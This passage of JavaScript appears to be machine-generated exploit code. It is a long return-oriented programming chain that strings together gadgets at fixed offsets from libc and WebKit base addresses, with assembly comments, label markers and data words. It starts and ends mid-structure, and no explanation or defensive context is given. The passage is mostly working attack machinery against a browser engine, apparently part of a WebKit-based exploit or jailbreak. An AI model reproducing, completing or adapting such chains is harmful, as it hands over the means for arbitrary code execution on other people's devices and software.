]);
//L592:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L594:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+89528, //L596
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L596:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+89584, //L597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L597:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+89680, //L600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L599:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L600:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L601:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+89776, //L602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+89792, //L603
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L602:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L603:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+89880, //L605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L605:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+89936, //L606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L606:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90008, //L609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L609:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90064, //L610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L610:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90152, //L612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L614:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+90272, //L617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+90256, //L615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L615:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L617:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90416, //L620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+90384, //L618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+90400, //L619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L618:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L619:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+90488, //L622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L622:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+90544, //L623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L623:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+90640, //L626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L625:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L626:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L627:
db([8, 0]); // 0x8
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+90736, //L628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+90752, //L629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L628:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L629:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+90840, //L631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L631:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+90896, //L632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L632:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+91000, //L634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L634:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L636:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+91120, //L639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+91104, //L637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L637:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L639:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91264, //L642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+91232, //L640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+91248, //L641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L640:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L641:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L642:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91336, //L644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+91392, //L645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L645:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+91488, //L648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L647:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L648:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L649:
db([7, 0]); // 0x7
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+91584, //L650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+91600, //L651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L650:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L651:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+91688, //L653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L653:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91744, //L654
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L654:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91816, //L657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L657:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+91872, //L658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L658:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+91960, //L660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L660:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L662:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+92080, //L665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92064, //L663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L663:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+92224, //L668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92192, //L666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92208, //L667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L666:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L667:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L668:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+92304, //L669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L669:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L671:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+92424, //L674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92408, //L672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L672:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+92568, //L677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+92536, //L675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92552, //L676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L675:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L677:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+92640, //L679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L679:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+92696, //L680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+92792, //L683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L682:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L683:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L684:
db([8, 0]); // 0x8
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+92888, //L685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+92904, //L686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L685:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L686:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+92992, //L688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93048, //L689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L689:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+93120, //L692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L692:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93176, //L693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L693:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L695:
libc_base+755774, //mov rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+93312, //L696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L696:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L698:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+93432, //L701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+93416, //L699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L699:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L701:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+93576, //L704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+93544, //L702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+93560, //L703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L702:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L703:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+93648, //L706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L706:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+93704, //L707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L707:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+93800, //L710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L709:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L711:
db([9, 0]); // 0x9
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+93896, //L712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+93912, //L713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L713:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+94000, //L715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L715:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94056, //L716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L716:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+94128, //L719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L719:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94184, //L720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L720:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L722:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+94320, //L723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L723:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L725:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+94440, //L728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+94424, //L726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L726:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L728:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+94584, //L731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+94552, //L729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+94568, //L730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L729:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L730:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L731:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+94656, //L733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L733:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+94712, //L734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L734:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+94808, //L737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L736:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L737:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L738:
db([10, 0]); // 0xa
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+94904, //L739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+94920, //L740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L739:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L740:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+95008, //L742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L742:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95064, //L743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L743:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95136, //L746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95192, //L747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L747:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95280, //L749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L749:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L751:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+95400, //L754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+95384, //L752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L752:
db([0, 0]); // 0x0
